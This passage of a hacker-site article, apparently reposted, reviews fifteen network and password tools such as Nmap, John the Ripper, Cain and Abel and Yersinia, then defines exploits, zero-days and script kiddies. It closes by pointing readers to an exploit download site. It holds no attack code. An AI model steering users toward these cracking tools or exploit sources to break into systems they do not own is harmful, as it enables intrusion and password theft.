both console and graphical versions are available. Nmap is free and open source.
Can be used by beginners (-sT) or by pros alike (packet_trace). A very
versatile tool, once you fully understand the results.

2. Nessus Remote Security Scanner
Recently went closed source, but is still essentially free. Works with a client-
server framework.
Nessus is the worlds most popular vulnerability scanner used in over 75,000
organizations world-wide. Many of the worlds largest organizations are
realizing significant cost savings by using Nessus to audit business-critical
enterprise devices and applications.

3. John the Ripper
Yes, JTR 1.7 was recently released!
John the Ripper is a fast password cracker, currently available for many
flavors of Unix (11 are officially supported, not counting different
architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect
weak Unix passwords. Besides several crypt(3) password hash types most commonly
found on various Unix flavors, supported out of the box are Kerberos AFS and
Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.
You can get JTR Here - http://www.openwall.com/john/

4. Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive
tests against web servers for multiple items, including over 3200 potentially
dangerous files/CGIs, versions on over 625 servers, and version specific
problems on over 230 servers. Scan items and plugins are frequently updated and
can be automatically updated (if desired).
Nikto is a good CGI scanner, there are some other tools that go well with Nikto
(focus on http fingerprinting or Google hacking/info gathering etc, another
article for just those).

5. SuperScan
Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the
highly popular Windows port scanning tool, SuperScan.
If you need an alternative for nmap on Windows with a decent interface, I
suggest you check this out, it’s pretty nice.
Get SuperScan Here - http://www.foundstone.com/index.htm
subnav=resources/navigation.htm&subcontent=/resources/proddesc/superscan4.htm

6. p0f
P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the
operating system on:
- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.
Basically it can fingerprint anything, just by listening, it doesn’t make ANY
active connections to the target machine.

7. Wireshark (Formely Ethereal)
Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you
capture and interactively browse the contents of network frames. The goal of
the project is to create a commercial-quality analyzer for Unix and to give
Wireshark features that are missing from closed-source sniffers.
Works great on both Linux and Windows (with a GUI), easy to use and can
reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.
Get Wireshark Here - http://www.wireshark.org/

8. Yersinia
Yersinia is a network tool designed to take advantage of some weakeness in
different Layer 2 protocols. It pretends to be a solid framework for analyzing
and testing the deployed networks and systems. Currently, the following network
protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery
Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration
Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch
Link Protocol (ISL), VLAN Trunking Protocol (VTP).
The best Layer 2 kit there is.

9. Eraser
Eraser is an advanced security tool (for Windows), which allows you to
completely remove sensitive data from your hard drive by overwriting it several
times with carefully selected patterns. Works with Windows 95, 98, ME, NT,
2000, XP and DOS. Eraser is Free software and its source code is released under
GNU General Public License.
An excellent tool for keeping your data really safe, if you’ve deleted it..make
sure it’s really gone, you don’t want it hanging around to bite you in the ass.

10. PuTTY
PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms,
along with an xterm terminal emulator. A must have for any h4. 0r wanting to
telnet or SSH from Windows without having to use the crappy default MS command
line clients.

11. LCP
Main purpose of LCP program is user account passwords auditing and recovery in
Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute
force session distribution, Hashes computing.
A good free alternative to L0phtcrack.
LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack
article.

12. Cain and Abel
My personal favourite for password cracking of any kind.
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It
allows easy recovery of various kind of passwords by sniffing the network,
cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis
attacks, recording VoIP conversations, decoding scrambled passwords, revealing
password boxes, uncovering cached passwords and analyzing routing protocols.
The program does not exploit any software vulnerabilities or bugs that could
not be fixed with little effort.
Get Cain and Abel Here - http://www.oxid.it/cain.html

13. Kismet
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion
detection system. Kismet will work with any wireless card which supports raw
monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.
A good wireless tool as long as your card supports rfmon (look for an orinocco
gold).

14. NetStumbler
Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux
counterparts, but it’s easy to use and has a nice interface, good for the
basics of war-driving.
NetStumbler is a tool for Windows that allows you to detect Wireless Local Area
Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:
Verify that your network is set up the way you intended.
Find locations with poor coverage in your WLAN.
Detect other networks that may be causing interference on your network.
Detect unauthorized rogue access points in your workplace.
Help aim directional antennas for long-haul WLAN links.
Use it recreationally for WarDriving.
Get NetStumbler Here - http://www.stumbler.net/
15. Hping
To finish off, something a little more advanced if you want to test your TCP/IP
packet monkey skills.
hping is a command-line oriented TCP/IP packet assembler/analyzer. The
interface is inspired to the ping unix command, but hping isn’t only able to
send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a
traceroute mode, the ability to send files between a covered channel, and many
other features.
Get hping Here - http://www.hping.org/

Exploit

A tool developed by hackers that is used to perform malicious attacks on computer systems. They are usually scripts that are designed to exploit weaknessness in software over a network, most commonly the Internet. Zero-Day is a common type of exploit.


Zero-Day Exploits
Called either Day Zero or Zero-Day, it is an exploit that takes advantage of a security vulnerability on the same day that the vulnerability becomes publicly or generally known. Zero-Day exploits are usually posted by well-known hacker groups. Software companies may issue a security bulletin or advisory when the exploit becomes known, but companies may not be able to offer a patch to fix the vulnerability for some time after.

An exploit (from the same word in the French language, meaning "achievement", or "accomplishment") is a piece of software, a chunk of data, or sequence of commands that takes advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerised). This frequently includes such things as gaining control of a computer system or allowing privilege escalation or a denial of service attack.

There are several methods of classifying exploits. The most common is by how the exploit contacts the vulnerable software. A 'remote exploit' works over a network and exploits the security vulnerability without any prior access to the vulnerable system. A 'local exploit' requires prior access to the vulnerable system and usually increases the privileges of the person running the exploit past those granted by the system administrator. Exploits against client applications also exist, usually consisting of modified servers that send an exploit if accessed with client application. Exploits against client applications may also require some interaction with the user and thus may be used in combination with social engineering method. This is the hacker way of getting into computers and websites for stealing data.

In computing, an exploit is an attack on a computer system, especially one that takes advantage of a particular vulnerability that the system offers to intruders. Used as a verb, the term refers to the act of successfully making such an attack.

In Exploit another classification is by the action against vulnerable system: unauthorized data access, arbitrary code execution, denial of service.

Many crackers (or hackers, if you prefer that term) take pride in keeping tabs of such exploits and post their exploits (and discovered vulnerabilities) on a Web site to share with others.

Where an exploit takes advantage of a weakness in an operating system or vended application program, the owners of the system or application issue a "fix" or patch in response. Users of the system or application are responsible for obtaining the patch, which can usually be downloaded from the Web. Failure to install a patch for a given problem exposes the user to a security breach. (However, it can be difficult to keep up with all the required patches.)

Many exploits are designed to provide superuser-level access to a computer system. However, it is also possible to use several exploits, first to gain low-level access, then to escalate privileges repeatedly until one reaches root.

Normally a single exploit can only take advantage of a specific software vulnerability. Often, when an exploit is published, the vulnerability is fixed through a patch and the exploit becomes obsolete for newer versions of the software. This is the reason why some blackhat hackers do not publish their exploits but keep them private to themselves or other crackers. Such exploits are referred to as 'zero day exploits' and to obtain access to such exploits is the primary desire of unskilled attackers, often nicknamed script kiddies.

Script Kiddie

A person, normally someone who is not technologically sophisticated, who randomly seeks out a specific weakness over the Internet in order to gain root access to a system without really understanding what it is s/he is exploiting because the weakness was discovered by someone else. A script kiddie is not looking to target specific information or a specific company but rather uses knowledge of a vulnerability to scan the entire Internet for a victim that possesses that vulnerability.
The vast majority of the "hacker" underground is made up of people who have only been using computers for a few years and who really know comparatively little about them. These are people, usually kids, who are attracted by the seemingly magical powers that hacking gives them. Since they know so little about computers, they don't really known how to hack themselves but instead follow recipes or "scripts" developed by real hackers. Most of these scripts are easy-to-use programs whereby the "script-kiddy" simply enters the IP address of the victim.
One of the distinguishing features of script-kiddies is that they must have a lot of patience. Because security holes are quickly found and repaired, most systems will resist most attacks. Therefore, if the script-kiddy is targeting a single system, they have to find a lot of scripts to try against the system before they find one that works. More commonly, the script-kiddies downloads one of the most recently developed scripts and proceeds to run it against targets all throughout the Internet until they find someone who is vulnerable to that specific script.
You can get update exploits from www.1337day.com

Sumber :Millw0rm

 Offical web : www.Millw0rm.cn